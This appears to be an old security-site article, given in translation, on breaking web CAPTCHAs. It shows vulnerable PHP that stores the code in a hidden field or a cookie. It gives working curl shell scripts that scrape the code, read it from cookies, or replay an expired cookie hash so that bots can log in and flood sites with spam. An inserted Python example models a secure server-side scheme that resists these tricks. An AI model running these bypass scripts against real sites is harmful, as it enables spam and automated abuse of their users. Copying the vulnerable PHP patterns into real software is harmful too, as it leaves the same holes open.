Guide: CAPTCHA cracking - Vulnerability Warning - Black Bar Security Net

ID MYHACK58:62200717939
Type myhack58
Reporter Anonymous
Modified 2007-12-30T00:00:00


A so-called verification code (CAPTCHA) is a string of randomly generated digits or symbols that is rendered into a picture; some interference pixels are added to the picture to defeat OCR, and the user reads the code visually, enters it into a form and submits it to the site for verification. Only after verification succeeds can the user access a given feature. Quite a few websites use CAPTCHA technology to stop users from letting robots register, log in or flood (post spam) automatically.

Many CAPTCHA implementations have problems, such as placing the code directly in the web page or in a cookie.

Example of a CAPTCHA placed directly in the web page:


    <?
    /*
     Filename: authpage.php
     Author: hutuworm
     Date: 2003-04-28
     @Copyleft
    */

    srand((double)microtime()*1000000);

    // Check whether the user's input matches the verification code
    if(isset($HTTP_POST_VARS['authinput']))
    {
        if(strcmp($HTTP_POST_VARS['authnum'],$HTTP_POST_VARS['authinput'])==0)
            echo "authentication success!";
        else
            echo "validation failed!";
    }

    // Generate a new four-digit integer code
    while(($authnum=rand()%10000)<1000);
    ?>
    <form action=authpage.php method=post>
    <table>
    Please enter the verification code:<input type=text name=authinput style="width: 80px"><br>
    <input type=submit name="verify" value="submit verification code">
    <input type=hidden name=authnum value=<? echo $authnum; ?>>
    <img src=authimg.php?authnum=<? echo $authnum; ?>>
    </table>
    </form>


The above example stores the code directly in the page (in a hidden form field). Simply downloading the page yields the CAPTCHA value, and the restriction is bypassed.


    #!/bin/sh
    curl [url]/authpage.php > grep.txt    # get the web page
    authnum=`grep '<input type=hidden name=authnum value=[[:digit:]]\{4\}>' grep.txt | sed -e 's/[^0-9]//g'`
    curl -d name=hacker -d submit="validate" -d authnum=$authnum -d authinput=$authnum [url]/authpage.php



    session_register("authnum");
    $authnum = strval(rand("1111","9999"));
    setcookie("authnum",$authnum);

    ...
    <input type=text name=authnum maxlength=4><img src=get_code.php>
    ...

    if($number != $login_check_number || empty($number))
    {
        print("checksum incorrect!");
        die();
    }


The second kind is a little smarter than the first: the CAPTCHA value is stored in the user's cookies. But since cookies are readable and writable by the user, it is also very easy to break.


    #!/bin/sh
    username=hacker
    password=hackme
    curl [url] -c common_cookie                        # receive the server's initial cookies
    curl [url] -c $username.cook -b common_cookie      # the verification code is now in the cookie file
    authnum=`grep authnum $username.cook | cut -f7`    # read the verification code out of the cookies
    curl [url] -b $username.cook -d authnum=$authnum -d username=$username -d password=$password   # log in using the CAPTCHA taken from the cookies


A more advanced CAPTCHA (it seems this forum uses this one). This class of CAPTCHA is more advanced than the two above; it uses the following algorithm:
1. The server generates a random hash.
2. Using an irreversible, hard-to-crack algorithm, the hash is converted into the code digits, which are then rendered into the picture.
3. The hash is sent to the client in a cookie.
4. The client enters the code read from the picture to log in. The server checks that f(hash) = CAPTCHA.

Features: because the attacker does not know the CAPTCHA encoding algorithm used by the server, the hash cannot be turned directly into the code.

To deal with this CAPTCHA we can use an "expired cookie": save one specific cookie issued by the server together with the code that corresponds to it. Every time a verification message is sent, discard the cookie the server has just issued and use this already-used cookie and its verification code instead. It is like a prepaid phone card that can be used many times over.

For example: first download a CAPTCHA picture from the server: curl /news/UploadFiles_9994/200712/20071219180451200.png. Read it manually to obtain $savecookie (the hash in the cookie file) and $authnum (the CAPTCHA). Every time the robot has to pass verification, it throws away the hash the server sent and forces the use of $savecookie and $authnum to get through.


    savecookie=294b506f05f896dcbb3a0dde86a5e36c
    num=7701
    username=hacker
    password=hackme

    curl [url] -c $username.cookie                                      # get the initial cookies and the session id
    grep -v authhash $username.cookie > tmp.$username                   # throw away the hash the server gave you
    echo "[domain]	FALSE	/	FALSE	0	authhash	$savecookie" >> tmp.$username   # force the use of the expired hash and CAPTCHA
    mv tmp.$username $username.cookie
    curl [url] -b $username.cookie -c $username.cookies -d username=$username -d password=$password -d authnum=$num   # log in using the expired verification code
    # Login succeeded; flood away......


The highest level of CAPTCHA. It uses the following method:
1. The server generates a random hash from user-related information such as the IP address and SID.
2. Using an irreversible, hard-to-crack algorithm, the hash is converted into the code digits.
3. The hash is no longer sent to the client. It is saved in a local database (usually the SESSIONS table) together with information about the user such as the IP address, and is pointed to by a sequence number seq. The seq can also be the session id.
4. seq is sent to the client as a cookie.
5. The client enters the verification code read from the picture.
6. Server verification: the server does not check f(hash) == code; it reads the expected code from the database. If the user's input matches the expected value, authentication succeeds. Some servers may also check the relationship between seq and the session id.
7. Once the user performs a verification, or requests the verification code again, the server replaces the hash value in the database with a new one and the old value expires.

Features:
× Cannot be replayed: the server only expects the code currently saved in the database, so an "expired" code cannot be used; the new code has replaced it.
× High strength: only seq is sent and the hash is kept locally, so deciphering f(hash) is extremely difficult.
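As an added example (not code from the article or its forum), a minimal Python model of this fourth scheme, which also shows why the hidden-field, cookie and "expired cookie" tricks used against the first three schemes fail against it. The class and method names, the server key, the seq values and the client addresses are all constructed for the illustration.

```python
import hmac
import hashlib
import secrets


class CaptchaStore:
    """Server-side CAPTCHA store modelled on the fourth scheme (added example, not the article's code).
    The client only ever receives `seq`; the hash and the expected code never leave the server."""

    def __init__(self, server_key: bytes):
        self.server_key = server_key
        self.db = {}  # seq -> {"hash", "ip", "code"}: stands in for the SESSIONS table

    @staticmethod
    def f(h: bytes) -> str:
        """Map the hash to a four-digit code (many hashes share one code, so f is not invertible)."""
        return "%04d" % (int.from_bytes(h[:4], "big") % 10000)

    def issue(self, seq: str, client_ip: str) -> str:
        """Steps 1-4: derive a fresh hash from user info plus randomness, store it under `seq`,
        and return the code that would be drawn into the picture. Only `seq` goes to the client."""
        material = f"{client_ip}|{seq}|{secrets.token_hex(16)}".encode()
        h = hmac.new(self.server_key, material, hashlib.sha256).digest()
        code = self.f(h)
        # Step 7: re-issuing overwrites the record, so the previous code expires immediately.
        self.db[seq] = {"hash": h, "ip": client_ip, "code": code}
        return code

    def verify(self, seq: str, client_ip: str, user_input: str) -> bool:
        """Step 6: compare against the code expected in the database, never against f(hash) of
        anything the client supplied. The record is consumed on every attempt (step 7)."""
        rec = self.db.pop(seq, None)  # gone whether or not it matches: no second try, no replay
        if rec is None or rec["ip"] != client_ip:  # seq must belong to the client it was issued to
            return False
        return hmac.compare_digest(rec["code"].encode(), user_input.encode())


def replay_demo() -> tuple:
    """Runs the article's tricks against the store with constructed values: the code is read
    once from the picture, then reused, then a re-issued seq is tried from another address."""
    store = CaptchaStore(b"constructed-server-key")
    seq, ip = "sess-0001", "10.0.0.5"              # constructed session id and client address
    code = store.issue(seq, ip)                     # what the operator reads off the picture
    first = store.verify(seq, ip, code)             # legitimate use -> True
    replay = store.verify(seq, ip, code)            # "expired cookie" trick: record consumed -> False
    code2 = store.issue(seq, ip)                    # user requests a new picture
    hijack = store.verify(seq, "10.0.0.9", code2)   # seq hijacking from another address -> False
    return first, replay, hijack
```

The replayed code fails not because it is wrong but because the server no longer holds a record for it, which is exactly the property the "cannot be replayed" feature above describes.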

Weaknesses: OCR (optical character recognition); seq hijacking; "CAPTCHA DoS", i.e. repeatedly requesting the code for some seq so that certain users cannot complete normal verification. To deal with this CAPTCHA I have no good method; the easy method is to download the CAPTCHA and display it to the user, who enters it before login. This only applies to occasions that are verified once, such as login authentication.


    curl [url]/news/UploadFiles_9994/200712/20071219180453716.png -c validcode_cookie   # get the CAPTCHA image and the corresponding seq
    seq=`grep seq validcode_cookie | cut -f7`
    echo -n "please input the code shown in validate.png: "
    read valid_number                                                                   # enter the verification code

Then log in and perform some automated actions, such as flooding like crazy.